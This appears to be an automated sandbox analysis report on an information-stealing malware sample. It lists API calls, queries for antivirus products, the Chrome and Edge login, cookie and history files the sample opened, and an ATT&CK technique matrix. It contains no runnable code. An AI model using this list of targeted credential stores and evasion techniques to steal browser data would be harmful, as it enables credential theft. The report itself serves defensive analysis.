                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,2_2_003187C8
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,2_2_0031884E
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00317BB3
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,2_2_00317E27
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00317E83
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00317F00
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00317F83
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00BD0116
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_00BC8178
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00BC82A2
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_00BC834F
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_00BC8423
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,3_2_00BC87C8
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,3_2_00BC884E
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,3_2_00BC7BB3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00BC7E83
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,3_2_00BC7E27
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_00BC7F83
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00BC7F00
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,4_2_0041205C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,4_2_0041614D
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_00412173
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoW,4_2_00416100
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,4_2_00416119
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,4_2_0040A120
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetConsoleOutputCP,GetLastError,GetConsoleAliasesA,TlsGetValue,FindAtomA,FreeEnvironmentStringsA,LoadLibraryW,LocalUnlock,TryEnterCriticalSection,LocalFree,GetLocaleInfoW,SetCurrentDirectoryW,CreateWaitableTimerW,CompareStringA,GetLongPathNameA,HeapFree,_calloc,_calloc,_memset,_calloc,_feof,VirtualLock,4_2_00441932
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,4_2_00410A55
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_0041227F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,4_2_0041220B
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_0041628C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,4_2_004173BC
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_00412451
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,4_2_00410504
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _strlen,EnumSystemLocalesA,4_2_00412515
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0041253E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,4_2_004125E1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_004125A5
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,4_2_00417650
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_0040FE96
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,4_2_0041078F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_005DBC42
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,memcpy,memcpy,memcpy,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,5_2_0042D0A0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,5_2_0042B1C8
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,5_2_00416190
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoA,LocalFree,5_2_00416209
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0042B2A2
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0042D62C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,5_2_0042A698
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_0042D721
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_0042D7C8
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_0042D823
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_0042D9F4
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,5_2_0042A9B6
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_00429A0C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_0042DAE0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,5_2_00428A82
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,5_2_00430AA4
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: _strlen,EnumSystemLocalesA,5_2_0042DAB7
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_0042DB47
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: GetLocaleInfoA,5_2_00430BD9
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_0042DB83
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 4_2_004418E0 DebugBreakProcess,FreeEnvironmentStringsA,CreateNamedPipeA,4_2_004418E0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Code function: 0_2_00BC2283 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00BC2283
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Code function: 0_2_00BA9F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Code function: 0_2_00BBFE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00BBFE47
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: build2.exe, 00000005.00000002.2908587009.00000000030D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: build2.exe PID: 7772, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                Remote Access Functionality

                Source: Yara match File source: 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: build2.exe PID: 7772, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E1307A sqlite3_transfer_bindings,5_2_61E1307A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D5E6 sqlite3_bind_int64,5_2_61E2D5E6
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D595 sqlite3_bind_double,5_2_61E2D595
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E0B431 sqlite3_clear_bindings,5_2_61E0B431
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E037F3 sqlite3_value_frombind,5_2_61E037F3
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D781 sqlite3_bind_zeroblob64,5_2_61E2D781
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D714 sqlite3_bind_zeroblob,5_2_61E2D714
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D68C sqlite3_bind_pointer,5_2_61E2D68C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D65B sqlite3_bind_null,5_2_61E2D65B
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D635 sqlite3_bind_int,5_2_61E2D635
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D9B0 sqlite3_bind_value,5_2_61E2D9B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D981 sqlite3_bind_text16,5_2_61E2D981
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D945 sqlite3_bind_text64,5_2_61E2D945
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D916 sqlite3_bind_text,5_2_61E2D916
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D8E7 sqlite3_bind_blob64,5_2_61E2D8E7
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E038CA sqlite3_bind_parameter_count,5_2_61E038CA
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E158CA sqlite3_bind_parameter_index,5_2_61E158CA
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E038DC sqlite3_bind_parameter_name,5_2_61E038DC
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Code function: 5_2_61E2D8B8 sqlite3_bind_blob,5_2_61E2D8B8
                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
                Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | 1 Taint Shared Content | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 12 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | 2 Data Encrypted for Impact | Acquire Infrastructure | Gather Victim Identity Information
                Default Accounts | 3 Native API | 1 Registry Run Keys / Startup Folder | 312 Process Injection | 4 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 21 Encrypted Channel | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials
                Domain Accounts | 3 Command and Scripting Interpreter | 1 Services File Permissions Weakness | 1 Registry Run Keys / Startup Folder | 22 Software Packing | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | Automated Exfiltration | 1 Non-Standard Port |  |  | Data Encrypted for Impact | DNS Server | Email Addresses
                Local Accounts | Cron | Login Hook | 1 Services File Permissions Weakness | 1 DLL Side-Loading | NTDS | 55 System Information Discovery | Distributed Component Object Model | Input Capture | Traffic Duplication | 2 Non-Application Layer Protocol |  |  | Data Destruction | Virtual Private Server | Employee Names
                Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 1 Query Registry | SSH | Keylogging | Scheduled Transfer | 113 Application Layer Protocol |  |  | Data Encrypted for Impact | Server | Gather Victim Network Information
                Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 271 Security Software Discovery | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication |  |  | Service Stop | Botnet | Domain Properties
                External Remote Services | Systemd Timers | Startup Items | Startup Items | 312 Process Injection | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port |  |  | Inhibit System Recovery | Web Services | DNS
                Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Services File Permissions Weakness | Proc Filesystem | 12 Process Discovery | Cloud Services | Credential API Hooking | Exfiltration Over Alternative Protocol | Application Layer Protocol |  |  | Defacement | Serverless | Network Trust Dependencies
                Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Web Protocols |  |  | Internal Defacement | Malvertising | Network Topology
                Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | File Transfer Protocols |  |  | External Defacement | Compromise Infrastructure | IP Addresses
